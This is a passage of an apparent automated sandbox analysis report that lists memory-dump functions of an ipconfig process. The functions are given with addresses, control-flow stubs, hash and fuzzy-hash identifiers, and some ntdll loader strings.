                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a9f8d0d71bbdc5dfc29e9e71200a22e86ce0dd4ac674b7a6e67b96fab6e36400
                                                                                    • Instruction ID: 3583771fe60190008cdbb63691ea6e5db91c0884afe56a8ba4f5cb0920ec4c93
                                                                                    • Opcode Fuzzy Hash: a9f8d0d71bbdc5dfc29e9e71200a22e86ce0dd4ac674b7a6e67b96fab6e36400
                                                                                    • Instruction Fuzzy Hash: DC90026135101C42D600A1585519B060046D7E1301F51C419E1154554DD739CC927126
                                                                                    Function 03262ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 127 3262ed0-3262edc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: e3e2dfc7b26302ceb270c46478f80de402c76924d809116e7b5d2f2b15c3c16b
                                                                                    • Instruction ID: 4554e27a3ff641586959689d493dfb3bd091fa13b9a4b540e4feee0babc67a0e
                                                                                    • Opcode Fuzzy Hash: e3e2dfc7b26302ceb270c46478f80de402c76924d809116e7b5d2f2b15c3c16b
                                                                                    • Instruction Fuzzy Hash: 0A900221611018424640B16899499064046BBE1211751C525A0A88550DD67988A56665
                                                                                    Function 03262D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 124 3262d10-3262d1c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 75e40314d9f2ec6d862d620a3c11aa341c7b9f5884f7e83360d0d7dda85d0477
                                                                                    • Instruction ID: ce3727d1c487c89dbbdb8d4c84c61d0b49d6452c8080ec3606689a24303ee599
                                                                                    • Opcode Fuzzy Hash: 75e40314d9f2ec6d862d620a3c11aa341c7b9f5884f7e83360d0d7dda85d0477
                                                                                    • Instruction Fuzzy Hash: 5B90023121101C13D611A1585609707004A97D0241F91C816A0514558DE7768992B121
                                                                                    Function 03262C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 121 3262c30-3262c3c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b7547e454b2b125fa7d2e3d648a5378d4fbbc40be4d5350d4f25464dc26f1832
                                                                                    • Instruction ID: 753b101995a716cf2e540eb77e9aba9b300b5e4fd98ed4f4fa2b0fbccad8a63a
                                                                                    • Opcode Fuzzy Hash: b7547e454b2b125fa7d2e3d648a5378d4fbbc40be4d5350d4f25464dc26f1832
                                                                                    • Instruction Fuzzy Hash: 8D90022922301802D680B158650D60A004697D1202F91D819A0105558CDA3588A96321
                                                                                    Function 03262C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 122 3262c50-3262c5c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6dc619083b4648d56fb4b5011b0c9082afb700dda258175c6a108ab66e64982a
                                                                                    • Instruction ID: a86ed6b08bd93ba3a14bbeb8bd35d435e00c8610afd4e31573a8777a95e9aeb6
                                                                                    • Opcode Fuzzy Hash: 6dc619083b4648d56fb4b5011b0c9082afb700dda258175c6a108ab66e64982a
                                                                                    • Instruction Fuzzy Hash: 3690022131101803D640B158651D6064046E7E1301F51D415E0504554CEA3588966222
                                                                                    Function 03262CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 123 3262cf0-3262cfc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0743edbb9c87b27fa4a2851b4cccf9094c6da311db60a6f0ffdd9f493474fea6
                                                                                    • Instruction ID: a6aa9c3e2e4c366211d2b1775a275fc6b67993fb6c9849ae031303eb7aad9487
                                                                                    • Opcode Fuzzy Hash: 0743edbb9c87b27fa4a2851b4cccf9094c6da311db60a6f0ffdd9f493474fea6
                                                                                    • Instruction Fuzzy Hash: 11900221252059525A45F15855095074047A7E0241791C416A1504950CD6369896E621
                                                                                    Function 03262B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 111 3262b2a-3262b2f 112 3262b31-3262b38 111->112 113 3262b3f-3262b46 LdrInitializeThunk 111->113
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 17dc9092c213773d8f399298725288eff59401713257b8010c334c424cd12c54
                                                                                    • Instruction ID: 510432a3790fd42d43e288f6623604e61a409ca58007800fd3792f83a2fb485b
                                                                                    • Opcode Fuzzy Hash: 17dc9092c213773d8f399298725288eff59401713257b8010c334c424cd12c54
                                                                                    • Instruction Fuzzy Hash: 71B09B719115D9C5DB11D760570C7177945BBD0701F15C455D1560641E8738C0D1F175
                                                                                    Function 027418BE Relevance: .0, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19059469940.0000000002720000.00000040.80000000.00040000.00000000.sdmp, Offset: 02720000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_2720000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aebbdbf5b1a83df169fb9af056e7ef47668fd6c8c2e1ddafa0e53b2c96a1dff8
                                                                                    • Instruction ID: e3cd68353d94c14104f0031ddd993c278a1df07a834e05f21ad80c20dd99946a
                                                                                    • Opcode Fuzzy Hash: aebbdbf5b1a83df169fb9af056e7ef47668fd6c8c2e1ddafa0e53b2c96a1dff8
                                                                                    • Instruction Fuzzy Hash: BDA0222F2002280BE220E22C080800C2B03BCE82003B33808C0820A00A0030E2000888

                                                                                    Non-executed Functions

                                                                                    Function 030E04E8 Relevance: .1, Instructions: 146COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061858287.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_30e0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5675a2c2fb5061f26c4026e77504dbef4212456d83f53537fb69bcb037562f40
                                                                                    • Instruction ID: 0dff5956925da9543e628fb2524b56e126b7ff6946e057887c60d1b4819b3ee2
                                                                                    • Opcode Fuzzy Hash: 5675a2c2fb5061f26c4026e77504dbef4212456d83f53537fb69bcb037562f40
                                                                                    • Instruction Fuzzy Hash: 8841E475A1AB0D4FD368EF69D0812B7B3E1FB85300F10462DD99AC7252EBB4E8468685
                                                                                    Function 03257550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • ExecuteOptions, xrefs: 032944AB
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03294507
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03294460
                                                                                    • Execute=1, xrefs: 0329451E
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0329454D
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 03294592
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03294530
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    • Opcode ID: fe61fab5602c89bcc3df679f59c349b7745ff55ca6f3d8f6ead4ee34875e5bd2
                                                                                    • Instruction ID: 37a6d8e20a0e90f20b74f7adec8c210687d892645b703c84e19cdb7cb7ca177f
                                                                                    • Opcode Fuzzy Hash: fe61fab5602c89bcc3df679f59c349b7745ff55ca6f3d8f6ead4ee34875e5bd2
                                                                                    • Instruction Fuzzy Hash: 8651D875AA13196BEF10EEA9DC95FAD77ACEF14300F0404E9ED05AB181DAB09BC58B50
                                                                                    Function 03229046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.19061934116.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.19061934116.0000000003319000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.19061934116.000000000331D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_31f0000_ipconfig.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: 2b67c2295aa7c2bfbe741380255aa0d991f044246cc652cab27674d8dd4dd581
                                                                                    • Instruction ID: a54086501d26327ce6d44e9d3f8c07444736718338905a359995c311b094b59d
                                                                                    • Opcode Fuzzy Hash: 2b67c2295aa7c2bfbe741380255aa0d991f044246cc652cab27674d8dd4dd581
                                                                                    • Instruction Fuzzy Hash: D0812971D11269DBDB35DB54CC45BEEB6B8AF08710F0445EAAA09B7290D7709EC4CFA0